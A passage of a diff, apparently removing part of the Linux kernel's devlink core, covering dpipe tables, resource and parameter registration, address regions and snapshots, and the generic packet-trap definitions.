+-	struct devlink_dpipe_table *table;
+-	bool enabled;
+-
+-	rcu_read_lock();
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	enabled = false;
+-	if (table)
+-		enabled = table->counters_enabled;
+-	rcu_read_unlock();
+-	return enabled;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_table_counter_enabled);
+-
+-/**
+- * devl_dpipe_table_register - register dpipe table
+- *
+- * @devlink: devlink
+- * @table_name: table name
+- * @table_ops: table ops
+- * @priv: priv
+- * @counter_control_extern: external control for counters
+- */
+-int devl_dpipe_table_register(struct devlink *devlink,
+-			      const char *table_name,
+-			      struct devlink_dpipe_table_ops *table_ops,
+-			      void *priv, bool counter_control_extern)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	if (WARN_ON(!table_ops->size_get))
+-		return -EINVAL;
+-
+-	if (devlink_dpipe_table_find(&devlink->dpipe_table_list, table_name,
+-				     devlink))
+-		return -EEXIST;
+-
+-	table = kzalloc(sizeof(*table), GFP_KERNEL);
+-	if (!table)
+-		return -ENOMEM;
+-
+-	table->name = table_name;
+-	table->table_ops = table_ops;
+-	table->priv = priv;
+-	table->counter_control_extern = counter_control_extern;
+-
+-	list_add_tail_rcu(&table->list, &devlink->dpipe_table_list);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_table_register);
+-
+-/**
+- * devl_dpipe_table_unregister - unregister dpipe table
+- *
+- * @devlink: devlink
+- * @table_name: table name
+- */
+-void devl_dpipe_table_unregister(struct devlink *devlink,
+-				 const char *table_name)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return;
+-	list_del_rcu(&table->list);
+-	kfree_rcu(table, rcu);
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_table_unregister);
+-
+-/**
+- * devl_resource_register - devlink resource register
+- *
+- * @devlink: devlink
+- * @resource_name: resource's name
+- * @resource_size: resource's size
+- * @resource_id: resource's id
+- * @parent_resource_id: resource's parent id
+- * @size_params: size parameters
+- *
+- * Generic resources should reuse the same names across drivers.
+- * Please see the generic resources list at:
+- * Documentation/networking/devlink/devlink-resource.rst
+- */
+-int devl_resource_register(struct devlink *devlink,
+-			   const char *resource_name,
+-			   u64 resource_size,
+-			   u64 resource_id,
+-			   u64 parent_resource_id,
+-			   const struct devlink_resource_size_params *size_params)
+-{
+-	struct devlink_resource *resource;
+-	struct list_head *resource_list;
+-	bool top_hierarchy;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	top_hierarchy = parent_resource_id == DEVLINK_RESOURCE_ID_PARENT_TOP;
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (resource)
+-		return -EINVAL;
+-
+-	resource = kzalloc(sizeof(*resource), GFP_KERNEL);
+-	if (!resource)
+-		return -ENOMEM;
+-
+-	if (top_hierarchy) {
+-		resource_list = &devlink->resource_list;
+-	} else {
+-		struct devlink_resource *parent_resource;
+-
+-		parent_resource = devlink_resource_find(devlink, NULL,
+-							parent_resource_id);
+-		if (parent_resource) {
+-			resource_list = &parent_resource->resource_list;
+-			resource->parent = parent_resource;
+-		} else {
+-			kfree(resource);
+-			return -EINVAL;
+-		}
+-	}
+-
+-	resource->name = resource_name;
+-	resource->size = resource_size;
+-	resource->size_new = resource_size;
+-	resource->id = resource_id;
+-	resource->size_valid = true;
+-	memcpy(&resource->size_params, size_params,
+-	       sizeof(resource->size_params));
+-	INIT_LIST_HEAD(&resource->resource_list);
+-	list_add_tail(&resource->list, resource_list);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_register);
+-
+-/**
+- *	devlink_resource_register - devlink resource register
+- *
+- *	@devlink: devlink
+- *	@resource_name: resource's name
+- *	@resource_size: resource's size
+- *	@resource_id: resource's id
+- *	@parent_resource_id: resource's parent id
+- *	@size_params: size parameters
+- *
+- *	Generic resources should reuse the same names across drivers.
+- *	Please see the generic resources list at:
+- *	Documentation/networking/devlink/devlink-resource.rst
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-int devlink_resource_register(struct devlink *devlink,
+-			      const char *resource_name,
+-			      u64 resource_size,
+-			      u64 resource_id,
+-			      u64 parent_resource_id,
+-			      const struct devlink_resource_size_params *size_params)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_resource_register(devlink, resource_name, resource_size,
+-				     resource_id, parent_resource_id, size_params);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_resource_register);
+-
+-static void devlink_resource_unregister(struct devlink *devlink,
+-					struct devlink_resource *resource)
+-{
+-	struct devlink_resource *tmp, *child_resource;
+-
+-	list_for_each_entry_safe(child_resource, tmp, &resource->resource_list,
+-				 list) {
+-		devlink_resource_unregister(devlink, child_resource);
+-		list_del(&child_resource->list);
+-		kfree(child_resource);
+-	}
+-}
+-
+-/**
+- * devl_resources_unregister - free all resources
+- *
+- * @devlink: devlink
+- */
+-void devl_resources_unregister(struct devlink *devlink)
+-{
+-	struct devlink_resource *tmp, *child_resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	list_for_each_entry_safe(child_resource, tmp, &devlink->resource_list,
+-				 list) {
+-		devlink_resource_unregister(devlink, child_resource);
+-		list_del(&child_resource->list);
+-		kfree(child_resource);
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devl_resources_unregister);
+-
+-/**
+- *	devlink_resources_unregister - free all resources
+- *
+- *	@devlink: devlink
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-void devlink_resources_unregister(struct devlink *devlink)
+-{
+-	devl_lock(devlink);
+-	devl_resources_unregister(devlink);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_resources_unregister);
+-
+-/**
+- * devl_resource_size_get - get and update size
+- *
+- * @devlink: devlink
+- * @resource_id: the requested resource id
+- * @p_resource_size: ptr to update
+- */
+-int devl_resource_size_get(struct devlink *devlink,
+-			   u64 resource_id,
+-			   u64 *p_resource_size)
+-{
+-	struct devlink_resource *resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (!resource)
+-		return -EINVAL;
+-	*p_resource_size = resource->size_new;
+-	resource->size = resource->size_new;
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_size_get);
+-
+-/**
+- * devl_dpipe_table_resource_set - set the resource id
+- *
+- * @devlink: devlink
+- * @table_name: table name
+- * @resource_id: resource id
+- * @resource_units: number of resource's units consumed per table's entry
+- */
+-int devl_dpipe_table_resource_set(struct devlink *devlink,
+-				  const char *table_name, u64 resource_id,
+-				  u64 resource_units)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return -EINVAL;
+-
+-	table->resource_id = resource_id;
+-	table->resource_units = resource_units;
+-	table->resource_valid = true;
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_table_resource_set);
+-
+-/**
+- * devl_resource_occ_get_register - register occupancy getter
+- *
+- * @devlink: devlink
+- * @resource_id: resource id
+- * @occ_get: occupancy getter callback
+- * @occ_get_priv: occupancy getter callback priv
+- */
+-void devl_resource_occ_get_register(struct devlink *devlink,
+-				    u64 resource_id,
+-				    devlink_resource_occ_get_t *occ_get,
+-				    void *occ_get_priv)
+-{
+-	struct devlink_resource *resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (WARN_ON(!resource))
+-		return;
+-	WARN_ON(resource->occ_get);
+-
+-	resource->occ_get = occ_get;
+-	resource->occ_get_priv = occ_get_priv;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_occ_get_register);
+-
+-/**
+- *	devlink_resource_occ_get_register - register occupancy getter
+- *
+- *	@devlink: devlink
+- *	@resource_id: resource id
+- *	@occ_get: occupancy getter callback
+- *	@occ_get_priv: occupancy getter callback priv
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-void devlink_resource_occ_get_register(struct devlink *devlink,
+-				       u64 resource_id,
+-				       devlink_resource_occ_get_t *occ_get,
+-				       void *occ_get_priv)
+-{
+-	devl_lock(devlink);
+-	devl_resource_occ_get_register(devlink, resource_id,
+-				       occ_get, occ_get_priv);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_resource_occ_get_register);
+-
+-/**
+- * devl_resource_occ_get_unregister - unregister occupancy getter
+- *
+- * @devlink: devlink
+- * @resource_id: resource id
+- */
+-void devl_resource_occ_get_unregister(struct devlink *devlink,
+-				      u64 resource_id)
+-{
+-	struct devlink_resource *resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (WARN_ON(!resource))
+-		return;
+-	WARN_ON(!resource->occ_get);
+-
+-	resource->occ_get = NULL;
+-	resource->occ_get_priv = NULL;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_occ_get_unregister);
+-
+-/**
+- *	devlink_resource_occ_get_unregister - unregister occupancy getter
+- *
+- *	@devlink: devlink
+- *	@resource_id: resource id
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-void devlink_resource_occ_get_unregister(struct devlink *devlink,
+-					 u64 resource_id)
+-{
+-	devl_lock(devlink);
+-	devl_resource_occ_get_unregister(devlink, resource_id);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_resource_occ_get_unregister);
+-
+-static int devlink_param_verify(const struct devlink_param *param)
+-{
+-	if (!param || !param->name || !param->supported_cmodes)
+-		return -EINVAL;
+-	if (param->generic)
+-		return devlink_param_generic_verify(param);
+-	else
+-		return devlink_param_driver_verify(param);
+-}
+-
+-/**
+- *	devlink_params_register - register configuration parameters
+- *
+- *	@devlink: devlink
+- *	@params: configuration parameters array
+- *	@params_count: number of parameters provided
+- *
+- *	Register the configuration parameters supported by the driver.
+- */
+-int devlink_params_register(struct devlink *devlink,
+-			    const struct devlink_param *params,
+-			    size_t params_count)
+-{
+-	const struct devlink_param *param = params;
+-	int i, err;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	for (i = 0; i < params_count; i++, param++) {
+-		err = devlink_param_register(devlink, param);
+-		if (err)
+-			goto rollback;
+-	}
+-	return 0;
+-
+-rollback:
+-	if (!i)
+-		return err;
+-
+-	for (param--; i > 0; i--, param--)
+-		devlink_param_unregister(devlink, param);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_params_register);
+-
+-/**
+- *	devlink_params_unregister - unregister configuration parameters
+- *	@devlink: devlink
+- *	@params: configuration parameters to unregister
+- *	@params_count: number of parameters provided
+- */
+-void devlink_params_unregister(struct devlink *devlink,
+-			       const struct devlink_param *params,
+-			       size_t params_count)
+-{
+-	const struct devlink_param *param = params;
+-	int i;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	for (i = 0; i < params_count; i++, param++)
+-		devlink_param_unregister(devlink, param);
+-}
+-EXPORT_SYMBOL_GPL(devlink_params_unregister);
+-
+-/**
+- * devlink_param_register - register one configuration parameter
+- *
+- * @devlink: devlink
+- * @param: one configuration parameter
+- *
+- * Register the configuration parameter supported by the driver.
+- * Return: returns 0 on successful registration or error code otherwise.
+- */
+-int devlink_param_register(struct devlink *devlink,
+-			   const struct devlink_param *param)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	WARN_ON(devlink_param_verify(param));
+-	WARN_ON(devlink_param_find_by_name(&devlink->param_list, param->name));
+-
+-	if (param->supported_cmodes == BIT(DEVLINK_PARAM_CMODE_DRIVERINIT))
+-		WARN_ON(param->get || param->set);
+-	else
+-		WARN_ON(!param->get || !param->set);
+-
+-	param_item = kzalloc(sizeof(*param_item), GFP_KERNEL);
+-	if (!param_item)
+-		return -ENOMEM;
+-
+-	param_item->param = param;
+-
+-	list_add_tail(&param_item->list, &devlink->param_list);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_register);
+-
+-/**
+- * devlink_param_unregister - unregister one configuration parameter
+- * @devlink: devlink
+- * @param: configuration parameter to unregister
+- */
+-void devlink_param_unregister(struct devlink *devlink,
+-			      const struct devlink_param *param)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	param_item =
+-		devlink_param_find_by_name(&devlink->param_list, param->name);
+-	WARN_ON(!param_item);
+-	list_del(&param_item->list);
+-	kfree(param_item);
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_unregister);
+-
+-/**
+- *	devlink_param_driverinit_value_get - get configuration parameter
+- *					     value for driver initializing
+- *
+- *	@devlink: devlink
+- *	@param_id: parameter ID
+- *	@init_val: value of parameter in driverinit configuration mode
+- *
+- *	This function should be used by the driver to get driverinit
+- *	configuration for initialization after reload command.
+- */
+-int devlink_param_driverinit_value_get(struct devlink *devlink, u32 param_id,
+-				       union devlink_param_value *init_val)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	if (!devlink_reload_supported(devlink->ops))
+-		return -EOPNOTSUPP;
+-
+-	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
+-	if (!param_item)
+-		return -EINVAL;
+-
+-	if (!param_item->driverinit_value_valid ||
+-	    !devlink_param_cmode_is_supported(param_item->param,
+-					      DEVLINK_PARAM_CMODE_DRIVERINIT))
+-		return -EOPNOTSUPP;
+-
+-	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
+-		strcpy(init_val->vstr, param_item->driverinit_value.vstr);
+-	else
+-		*init_val = param_item->driverinit_value;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_get);
+-
+-/**
+- *	devlink_param_driverinit_value_set - set value of configuration
+- *					     parameter for driverinit
+- *					     configuration mode
+- *
+- *	@devlink: devlink
+- *	@param_id: parameter ID
+- *	@init_val: value of parameter to set for driverinit configuration mode
+- *
+- *	This function should be used by the driver to set driverinit
+- *	configuration mode default value.
+- */
+-int devlink_param_driverinit_value_set(struct devlink *devlink, u32 param_id,
+-				       union devlink_param_value init_val)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
+-	if (!param_item)
+-		return -EINVAL;
+-
+-	if (!devlink_param_cmode_is_supported(param_item->param,
+-					      DEVLINK_PARAM_CMODE_DRIVERINIT))
+-		return -EOPNOTSUPP;
+-
+-	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
+-		strcpy(param_item->driverinit_value.vstr, init_val.vstr);
+-	else
+-		param_item->driverinit_value = init_val;
+-	param_item->driverinit_value_valid = true;
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_set);
+-
+-/**
+- *	devlink_param_value_changed - notify devlink on a parameter's value
+- *				      change. Should be called by the driver
+- *				      right after the change.
+- *
+- *	@devlink: devlink
+- *	@param_id: parameter ID
+- *
+- *	This function should be used by the driver to notify devlink on value
+- *	change, excluding driverinit configuration mode.
+- *	For driverinit configuration mode driver should use the function
+- */
+-void devlink_param_value_changed(struct devlink *devlink, u32 param_id)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
+-	WARN_ON(!param_item);
+-
+-	devlink_param_notify(devlink, 0, param_item, DEVLINK_CMD_PARAM_NEW);
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_value_changed);
+-
+-/**
+- * devl_region_create - create a new address region
+- *
+- * @devlink: devlink
+- * @ops: region operations and name
+- * @region_max_snapshots: Maximum supported number of snapshots for region
+- * @region_size: size of region
+- */
+-struct devlink_region *devl_region_create(struct devlink *devlink,
+-					  const struct devlink_region_ops *ops,
+-					  u32 region_max_snapshots,
+-					  u64 region_size)
+-{
+-	struct devlink_region *region;
+-
+-	devl_assert_locked(devlink);
+-
+-	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
+-		return ERR_PTR(-EINVAL);
+-
+-	if (devlink_region_get_by_name(devlink, ops->name))
+-		return ERR_PTR(-EEXIST);
+-
+-	region = kzalloc(sizeof(*region), GFP_KERNEL);
+-	if (!region)
+-		return ERR_PTR(-ENOMEM);
+-
+-	region->devlink = devlink;
+-	region->max_snapshots = region_max_snapshots;
+-	region->ops = ops;
+-	region->size = region_size;
+-	INIT_LIST_HEAD(&region->snapshot_list);
+-	mutex_init(&region->snapshot_lock);
+-	list_add_tail(&region->list, &devlink->region_list);
+-	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
+-
+-	return region;
+-}
+-EXPORT_SYMBOL_GPL(devl_region_create);
+-
+-/**
+- *	devlink_region_create - create a new address region
+- *
+- *	@devlink: devlink
+- *	@ops: region operations and name
+- *	@region_max_snapshots: Maximum supported number of snapshots for region
+- *	@region_size: size of region
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-struct devlink_region *
+-devlink_region_create(struct devlink *devlink,
+-		      const struct devlink_region_ops *ops,
+-		      u32 region_max_snapshots, u64 region_size)
+-{
+-	struct devlink_region *region;
+-
+-	devl_lock(devlink);
+-	region = devl_region_create(devlink, ops, region_max_snapshots,
+-				    region_size);
+-	devl_unlock(devlink);
+-	return region;
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_create);
+-
+-/**
+- *	devlink_port_region_create - create a new address region for a port
+- *
+- *	@port: devlink port
+- *	@ops: region operations and name
+- *	@region_max_snapshots: Maximum supported number of snapshots for region
+- *	@region_size: size of region
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-struct devlink_region *
+-devlink_port_region_create(struct devlink_port *port,
+-			   const struct devlink_port_region_ops *ops,
+-			   u32 region_max_snapshots, u64 region_size)
+-{
+-	struct devlink *devlink = port->devlink;
+-	struct devlink_region *region;
+-	int err = 0;
+-
+-	ASSERT_DEVLINK_PORT_INITIALIZED(port);
+-
+-	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
+-		return ERR_PTR(-EINVAL);
+-
+-	devl_lock(devlink);
+-
+-	if (devlink_port_region_get_by_name(port, ops->name)) {
+-		err = -EEXIST;
+-		goto unlock;
+-	}
+-
+-	region = kzalloc(sizeof(*region), GFP_KERNEL);
+-	if (!region) {
+-		err = -ENOMEM;
+-		goto unlock;
+-	}
+-
+-	region->devlink = devlink;
+-	region->port = port;
+-	region->max_snapshots = region_max_snapshots;
+-	region->port_ops = ops;
+-	region->size = region_size;
+-	INIT_LIST_HEAD(&region->snapshot_list);
+-	mutex_init(&region->snapshot_lock);
+-	list_add_tail(&region->list, &port->region_list);
+-	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
+-
+-	devl_unlock(devlink);
+-	return region;
+-
+-unlock:
+-	devl_unlock(devlink);
+-	return ERR_PTR(err);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_region_create);
+-
+-/**
+- * devl_region_destroy - destroy address region
+- *
+- * @region: devlink region to destroy
+- */
+-void devl_region_destroy(struct devlink_region *region)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct devlink_snapshot *snapshot, *ts;
+-
+-	devl_assert_locked(devlink);
+-
+-	/* Free all snapshots of region */
+-	mutex_lock(&region->snapshot_lock);
+-	list_for_each_entry_safe(snapshot, ts, &region->snapshot_list, list)
+-		devlink_region_snapshot_del(region, snapshot);
+-	mutex_unlock(&region->snapshot_lock);
+-
+-	list_del(&region->list);
+-	mutex_destroy(&region->snapshot_lock);
+-
+-	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
+-	kfree(region);
+-}
+-EXPORT_SYMBOL_GPL(devl_region_destroy);
+-
+-/**
+- *	devlink_region_destroy - destroy address region
+- *
+- *	@region: devlink region to destroy
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-void devlink_region_destroy(struct devlink_region *region)
+-{
+-	struct devlink *devlink = region->devlink;
+-
+-	devl_lock(devlink);
+-	devl_region_destroy(region);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_destroy);
+-
+-/**
+- *	devlink_region_snapshot_id_get - get snapshot ID
+- *
+- *	This callback should be called when adding a new snapshot,
+- *	Driver should use the same id for multiple snapshots taken
+- *	on multiple regions at the same time/by the same trigger.
+- *
+- *	The caller of this function must use devlink_region_snapshot_id_put
+- *	when finished creating regions using this id.
+- *
+- *	Returns zero on success, or a negative error code on failure.
+- *
+- *	@devlink: devlink
+- *	@id: storage to return id
+- */
+-int devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
+-{
+-	return __devlink_region_snapshot_id_get(devlink, id);
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_get);
+-
+-/**
+- *	devlink_region_snapshot_id_put - put snapshot ID reference
+- *
+- *	This should be called by a driver after finishing creating snapshots
+- *	with an id. Doing so ensures that the ID can later be released in the
+- *	event that all snapshots using it have been destroyed.
+- *
+- *	@devlink: devlink
+- *	@id: id to release reference on
+- */
+-void devlink_region_snapshot_id_put(struct devlink *devlink, u32 id)
+-{
+-	__devlink_snapshot_id_decrement(devlink, id);
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_put);
+-
+-/**
+- *	devlink_region_snapshot_create - create a new snapshot
+- *	This will add a new snapshot of a region. The snapshot
+- *	will be stored on the region struct and can be accessed
+- *	from devlink. This is useful for future analyses of snapshots.
+- *	Multiple snapshots can be created on a region.
+- *	The @snapshot_id should be obtained using the getter function.
+- *
+- *	@region: devlink region of the snapshot
+- *	@data: snapshot data
+- *	@snapshot_id: snapshot id to be created
+- */
+-int devlink_region_snapshot_create(struct devlink_region *region,
+-				   u8 *data, u32 snapshot_id)
+-{
+-	int err;
+-
+-	mutex_lock(&region->snapshot_lock);
+-	err = __devlink_region_snapshot_create(region, data, snapshot_id);
+-	mutex_unlock(&region->snapshot_lock);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_snapshot_create);
+-
+-#define DEVLINK_TRAP(_id, _type)					      \
+-	{								      \
+-		.type = DEVLINK_TRAP_TYPE_##_type,			      \
+-		.id = DEVLINK_TRAP_GENERIC_ID_##_id,			      \
+-		.name = DEVLINK_TRAP_GENERIC_NAME_##_id,		      \
+-	}
+-
+-static const struct devlink_trap devlink_trap_generic[] = {
+-	DEVLINK_TRAP(SMAC_MC, DROP),
+-	DEVLINK_TRAP(VLAN_TAG_MISMATCH, DROP),
+-	DEVLINK_TRAP(INGRESS_VLAN_FILTER, DROP),
+-	DEVLINK_TRAP(INGRESS_STP_FILTER, DROP),
+-	DEVLINK_TRAP(EMPTY_TX_LIST, DROP),
+-	DEVLINK_TRAP(PORT_LOOPBACK_FILTER, DROP),
+-	DEVLINK_TRAP(BLACKHOLE_ROUTE, DROP),
+-	DEVLINK_TRAP(TTL_ERROR, EXCEPTION),
+-	DEVLINK_TRAP(TAIL_DROP, DROP),
+-	DEVLINK_TRAP(NON_IP_PACKET, DROP),
+-	DEVLINK_TRAP(UC_DIP_MC_DMAC, DROP),
+-	DEVLINK_TRAP(DIP_LB, DROP),
+-	DEVLINK_TRAP(SIP_MC, DROP),
+-	DEVLINK_TRAP(SIP_LB, DROP),
+-	DEVLINK_TRAP(CORRUPTED_IP_HDR, DROP),
+-	DEVLINK_TRAP(IPV4_SIP_BC, DROP),
+-	DEVLINK_TRAP(IPV6_MC_DIP_RESERVED_SCOPE, DROP),
+-	DEVLINK_TRAP(IPV6_MC_DIP_INTERFACE_LOCAL_SCOPE, DROP),
+-	DEVLINK_TRAP(MTU_ERROR, EXCEPTION),
+-	DEVLINK_TRAP(UNRESOLVED_NEIGH, EXCEPTION),
+-	DEVLINK_TRAP(RPF, EXCEPTION),
+-	DEVLINK_TRAP(REJECT_ROUTE, EXCEPTION),
+-	DEVLINK_TRAP(IPV4_LPM_UNICAST_MISS, EXCEPTION),
+-	DEVLINK_TRAP(IPV6_LPM_UNICAST_MISS, EXCEPTION),
+-	DEVLINK_TRAP(NON_ROUTABLE, DROP),
+-	DEVLINK_TRAP(DECAP_ERROR, EXCEPTION),
+-	DEVLINK_TRAP(OVERLAY_SMAC_MC, DROP),
+-	DEVLINK_TRAP(INGRESS_FLOW_ACTION_DROP, DROP),
+-	DEVLINK_TRAP(EGRESS_FLOW_ACTION_DROP, DROP),
+-	DEVLINK_TRAP(STP, CONTROL),
+-	DEVLINK_TRAP(LACP, CONTROL),
+-	DEVLINK_TRAP(LLDP, CONTROL),
+-	DEVLINK_TRAP(IGMP_QUERY, CONTROL),
+-	DEVLINK_TRAP(IGMP_V1_REPORT, CONTROL),
+-	DEVLINK_TRAP(IGMP_V2_REPORT, CONTROL),
+-	DEVLINK_TRAP(IGMP_V3_REPORT, CONTROL),
+-	DEVLINK_TRAP(IGMP_V2_LEAVE, CONTROL),
+-	DEVLINK_TRAP(MLD_QUERY, CONTROL),
+-	DEVLINK_TRAP(MLD_V1_REPORT, CONTROL),
+-	DEVLINK_TRAP(MLD_V2_REPORT, CONTROL),
+-	DEVLINK_TRAP(MLD_V1_DONE, CONTROL),
+-	DEVLINK_TRAP(IPV4_DHCP, CONTROL),
+-	DEVLINK_TRAP(IPV6_DHCP, CONTROL),
+-	DEVLINK_TRAP(ARP_REQUEST, CONTROL),
+-	DEVLINK_TRAP(ARP_RESPONSE, CONTROL),
+-	DEVLINK_TRAP(ARP_OVERLAY, CONTROL),
+-	DEVLINK_TRAP(IPV6_NEIGH_SOLICIT, CONTROL),
+-	DEVLINK_TRAP(IPV6_NEIGH_ADVERT, CONTROL),
+-	DEVLINK_TRAP(IPV4_BFD, CONTROL),
+-	DEVLINK_TRAP(IPV6_BFD, CONTROL),
+-	DEVLINK_TRAP(IPV4_OSPF, CONTROL),
+-	DEVLINK_TRAP(IPV6_OSPF, CONTROL),
+-	DEVLINK_TRAP(IPV4_BGP, CONTROL),
+-	DEVLINK_TRAP(IPV6_BGP, CONTROL),
+-	DEVLINK_TRAP(IPV4_VRRP, CONTROL),
+-	DEVLINK_TRAP(IPV6_VRRP, CONTROL),
+-	DEVLINK_TRAP(IPV4_PIM, CONTROL),
+-	DEVLINK_TRAP(IPV6_PIM, CONTROL),
+-	DEVLINK_TRAP(UC_LB, CONTROL),
+-	DEVLINK_TRAP(LOCAL_ROUTE, CONTROL),
+-	DEVLINK_TRAP(EXTERNAL_ROUTE, CONTROL),
+-	DEVLINK_TRAP(IPV6_UC_DIP_LINK_LOCAL_SCOPE, CONTROL),
+-	DEVLINK_TRAP(IPV6_DIP_ALL_NODES, CONTROL),
+-	DEVLINK_TRAP(IPV6_DIP_ALL_ROUTERS, CONTROL),
+-	DEVLINK_TRAP(IPV6_ROUTER_SOLICIT, CONTROL),
+-	DEVLINK_TRAP(IPV6_ROUTER_ADVERT, CONTROL),
+-	DEVLINK_TRAP(IPV6_REDIRECT, CONTROL),
+-	DEVLINK_TRAP(IPV4_ROUTER_ALERT, CONTROL),
+-	DEVLINK_TRAP(IPV6_ROUTER_ALERT, CONTROL),
+-	DEVLINK_TRAP(PTP_EVENT, CONTROL),
+-	DEVLINK_TRAP(PTP_GENERAL, CONTROL),
+-	DEVLINK_TRAP(FLOW_ACTION_SAMPLE, CONTROL),
+-	DEVLINK_TRAP(FLOW_ACTION_TRAP, CONTROL),
+-	DEVLINK_TRAP(EARLY_DROP, DROP),
+-	DEVLINK_TRAP(VXLAN_PARSING, DROP),
+-	DEVLINK_TRAP(LLC_SNAP_PARSING, DROP),
+-	DEVLINK_TRAP(VLAN_PARSING, DROP),
+-	DEVLINK_TRAP(PPPOE_PPP_PARSING, DROP),
+-	DEVLINK_TRAP(MPLS_PARSING, DROP),
+-	DEVLINK_TRAP(ARP_PARSING, DROP),
+-	DEVLINK_TRAP(IP_1_PARSING, DROP),
+-	DEVLINK_TRAP(IP_N_PARSING, DROP),
+-	DEVLINK_TRAP(GRE_PARSING, DROP),
+-	DEVLINK_TRAP(UDP_PARSING, DROP),
+-	DEVLINK_TRAP(TCP_PARSING, DROP),
+-	DEVLINK_TRAP(IPSEC_PARSING, DROP),
+-	DEVLINK_TRAP(SCTP_PARSING, DROP),
+-	DEVLINK_TRAP(DCCP_PARSING, DROP),
+-	DEVLINK_TRAP(GTP_PARSING, DROP),
+-	DEVLINK_TRAP(ESP_PARSING, DROP),
+-	DEVLINK_TRAP(BLACKHOLE_NEXTHOP, DROP),
+-	DEVLINK_TRAP(DMAC_FILTER, DROP),
+-};
+-
+-#define DEVLINK_TRAP_GROUP(_id)						      \
+-	{								      \
+-		.id = DEVLINK_TRAP_GROUP_GENERIC_ID_##_id,		      \
+-		.name = DEVLINK_TRAP_GROUP_GENERIC_NAME_##_id,		      \
+-	}
+-
+-static const struct devlink_trap_group devlink_trap_group_generic[] = {
+-	DEVLINK_TRAP_GROUP(L2_DROPS),
+-	DEVLINK_TRAP_GROUP(L3_DROPS),
+-	DEVLINK_TRAP_GROUP(L3_EXCEPTIONS),
+-	DEVLINK_TRAP_GROUP(BUFFER_DROPS),
+-	DEVLINK_TRAP_GROUP(TUNNEL_DROPS),
+-	DEVLINK_TRAP_GROUP(ACL_DROPS),
+-	DEVLINK_TRAP_GROUP(STP),
+-	DEVLINK_TRAP_GROUP(LACP),
